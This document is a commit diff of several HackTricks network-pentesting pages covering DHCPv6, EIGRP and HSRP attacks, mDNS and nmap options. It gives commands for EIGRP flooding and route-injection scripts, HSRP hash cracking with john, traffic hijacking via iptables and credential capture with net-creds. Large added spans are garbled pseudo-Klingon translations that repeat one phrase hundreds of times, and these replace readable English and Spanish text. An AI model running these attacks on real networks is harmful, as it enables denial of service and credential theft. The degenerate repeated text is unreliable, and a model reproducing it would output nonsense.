<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

File diff suppressed because one or more lines are too long

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -19,16 +17,16 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table
| DHCPv6 Message Type | DHCPv4 Message Type | | DHCPv6 Message Type | DHCPv4 Message Type |
|:-------------------|:-------------------| |:-------------------|:-------------------|
| Solicit (1) | DHCPDISCOVER | | **Solicit (1)** | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER | | **Advertise (2)** | DHCPOFFER |
| Request (3), Renew (5), Rebind (6) | DHCPREQUEST | | **Request (3), Renew (5), Rebind (6)** | DHCPREQUEST |
| Reply (7) | DHCPACK / DHCPNAK | | **Reply (7)** | DHCPACK / DHCPNAK |
| Release (8) | DHCPRELEASE | | **Release (8)** | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM | | **Information-Request (11)** | DHCPINFORM |
| Decline (9) | DHCPDECLINE | | **Decline (9)** | DHCPDECLINE |
| Confirm (4) | none | | **Confirm (4)** | none |
| Reconfigure (10) | DHCPFORCERENEW | | **Reconfigure (10)** | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | none | | **Relay-Forw (12), Relay-Reply (13)** | none |
**Detailed Explanation of DHCPv6 Message Types:** **Detailed Explanation of DHCPv6 Message Types:**
@ -63,5 +61,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -21,59 +21,59 @@ Other ways to support HackTricks:
- **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack. - **Objective**: To overload router CPUs by flooding them with EIGRP hello packets, potentially leading to a Denial of Service (DoS) attack.
- **Tool**: **helloflooding.py** script. - **Tool**: **helloflooding.py** script.
- **Execution**: - **Execution**:
%%%bash %%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%% %%%
- **Parameters**: - **Parameters**:
- `--interface`: Specifies the network interface, e.g., `eth0`. - `--interface`: Specifies the network interface, e.g., `eth0`.
- `--as`: Defines the EIGRP autonomous system number, e.g., `1`. - `--as`: Defines the EIGRP autonomous system number, e.g., `1`.
- `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`. - `--subnet`: Sets the subnet location, e.g., `10.10.100.0/24`.
## **EIGRP Blackhole Attack** ## **EIGRP Blackhole Attack**
- **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination. - **Objective**: To disrupt network traffic flow by injecting a false route, leading to a blackhole where the traffic is directed to a non-existent destination.
- **Tool**: **routeinject.py** script. - **Tool**: **routeinject.py** script.
- **Execution**: - **Execution**:
%%%bash %%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%% %%%
- **Parameters**: - **Parameters**:
- `--interface`: Specifies the attackers system interface. - `--interface`: Specifies the attackers system interface.
- `--as`: Defines the EIGRP AS number. - `--as`: Defines the EIGRP AS number.
- `--src`: Sets the attackers IP address. - `--src`: Sets the attackers IP address.
- `--dst`: Sets the target subnet IP. - `--dst`: Sets the target subnet IP.
- `--prefix`: Defines the mask of the target subnet IP. - `--prefix`: Defines the mask of the target subnet IP.
## **Abusing K-Values Attack** ## **Abusing K-Values Attack**
- **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack. - **Objective**: To create continuous disruptions and reconnections within the EIGRP domain by injecting altered K-values, effectively resulting in a DoS attack.
- **Tool**: **relationshipnightmare.py** script. - **Tool**: **relationshipnightmare.py** script.
- **Execution**: - **Execution**:
%%%bash %%%bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
%%% %%%
- **Parameters**: - **Parameters**:
- `--interface`: Specifies the network interface. - `--interface`: Specifies the network interface.
- `--as`: Defines the EIGRP AS number. - `--as`: Defines the EIGRP AS number.
- `--src`: Sets the IP Address of a legitimate router. - `--src`: Sets the IP Address of a legitimate router.
## **Routing Table Overflow Attack** ## **Routing Table Overflow Attack**
- **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes. - **Objective**: To strain the router's CPU and RAM by flooding the routing table with numerous false routes.
- **Tool**: **routingtableoverflow.py** script. - **Tool**: **routingtableoverflow.py** script.
- **Execution**: - **Execution**:
%%%bash %%%bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%% %%%
- **Parameters**: - **Parameters**:
- `--interface`: Specifies the network interface. - `--interface`: Specifies the network interface.
- `--as`: Defines the EIGRP AS number. - `--as`: Defines the EIGRP AS number.
- `--src`: Sets the attackers IP address. - `--src`: Sets the attackers IP address.
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -57,7 +57,6 @@ Attack Steps:
By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data. By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data.
For demonstration, here are the required command snippets: For demonstration, here are the required command snippets:
```bash ```bash
# Enable promiscuous mode and IP forwarding # Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on sudo ip link set eth0 promisc on
@ -71,82 +70,7 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo route del default sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
``` ```
### HSRP Hijacking with Command Details
Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
### Passive Explanation of HSRP Hijacking with Command Details
#### Overview of HSRP (Hot Standby Router/Redundancy Protocol) #### Overview of HSRP (Hot Standby Router/Redundancy Protocol)
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management. HSRP (Hot Standby Router/Redundancy Protocol) jatlh Cisco proprietary protocol Hoch network gateway redundancy laH. 'oH multiple physical routers configuration 'ej shared IP address vItlhutlh. vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' v
#### Roles and Terminology in HSRP
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
- **HSRP Standby Router**: A backup router, ready to take over if the active router fails.
- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router.
- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup.
- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices.
#### HSRP Versions
HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval.
#### HSRP Attack Mechanism
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
#### Steps for Bypassing HSRP Authentication
1. Save the network traffic containing HSRP data as a .pcap file.
```shell
tcpdump -w hsrp_traffic.pcap
```
2. Extract MD5 hashes from the .pcap file using hsrp2john.py.
```shell
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
```
3. Crack the MD5 hashes using John the Ripper.
```shell
john --wordlist=mywordlist.txt hsrp_hashes
```
**Executing HSRP Injection with Loki**
1. Launch Loki to identify HSRP advertisements.
2. Set the network interface to promiscuous mode and enable IP forwarding.
```shell
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
```
3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router.
4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic.
```shell
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```
5. Modify the routing table to route traffic through the former Active Router.
```shell
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
```
6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic.
```shell
sudo python2 net-creds.py -i eth0
```
Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures.
## References
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -60,7 +58,7 @@ Or maybe, 2 packets with the same offset comes and the host has to decide which
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -71,5 +69,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -23,10 +21,10 @@ Key points to note:
- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero. - **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero.
- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments. - **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments.
- **Networking Details**: - **Networking Details**:
- Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. - Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
- IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. - IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
- Operates over UDP port 5353. - Operates over UDP port 5353.
- mDNS queries are confined to the local network and do not cross routers. - mDNS queries are confined to the local network and do not cross routers.
## DNS-SD (Service Discovery) ## DNS-SD (Service Discovery)
@ -74,5 +72,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -13,11 +13,9 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
``` ```
nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
``` ```
## Parameters ## Parameters
### IPs to scan ### IPs to scan
@ -68,37 +66,36 @@ By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP`
**-O** Deteccion de os **-O** Deteccion de os
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo) **--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se
**--osscan-guess** QaStaHvIS 'ej Dalo'Ha' 'e' vItlhutlh
**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más
**Scripts** **Scripts**
\--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...] \--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...]
Para usar los de por efecto vale con -sC o --script=default ghItlh ScriptmeyDaq -sC be' 'ej --script=default
Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, 'ej vuln DaH jImej
* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación * **Auth:** authentication laH scriptmeyDaq cha'logh
* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta * **Default:** nmap DaH scriptmeyDaq pagh
* **Discovery:** recupera información del _target_ o víctima * **Discovery:** target vItlhutlh vItlhutlh
* **External:** _script_ para utilizar recursos externos * **External:** scriptmeyDaq vItlhutlh
* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_ * **Intrusive:** target vItlhutlh scriptmeyDaq
* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras) * **Malware:** malware 'ej 'oH 'ej backdoors vItlhutlh
* **Safe:** ejecuta _scripts_ que no son intrusivos * **Safe:** scriptmeyDaq vItlhutlh
* **Vuln:** descubre las vulnerabilidades más conocidas * **Vuln:** vuln vItlhutlh
* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles * **All:** nmap DaH scriptmeyDaq NSE DaH pagh
Para buscar scripts: ScriptmeyDaq vItlhutlh:
**nmap --script-help="http-\*" -> Los que empiecen por http-** **nmap --script-help="http-\*" -> http- vItlhutlh**
**nmap --script-help="not intrusive" -> Todos menos esos** **nmap --script-help="not intrusive" -> vItlhutlh**
**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos** **nmap --script-help="default or safe" -> vItlhutlh**
**nmap --script-help="default and safe" --> Los que estan en ambos** **nmap --script-help="default and safe" --> vItlhutlh**
**nmap --script-help="(default or safe or intrusive) and not http-\*"** **nmap --script-help="(default or safe or intrusive) and not http-\*"**
@ -108,117 +105,86 @@ Para buscar scripts:
\--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...] \--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...]
\--script-trace ---> Da info de como va elscript \--script-trace ---> scriptmeyDaq DaH vItlhutlh
\--script-updatedb \--script-updatedb
**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros. Script vItlhutlh nmap --script target DaH namp --script Name_of_script --> script 'ej 'ej nmap scanner, vaj 'ej scanner options, 'ej **"safe=1"** vItlhutlh'e' vItlhutlh'e'
**Control tiempo** **time control**
**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing. Nmap vItlhutlh time seconds, minutes, ms modify: --host-timeout arguments 900000ms, 900, 900s, 'ej 15m vItlhutlh
Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256. Nmap target vItlhutlh groups vItlhutlh analyze, 'ej vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze 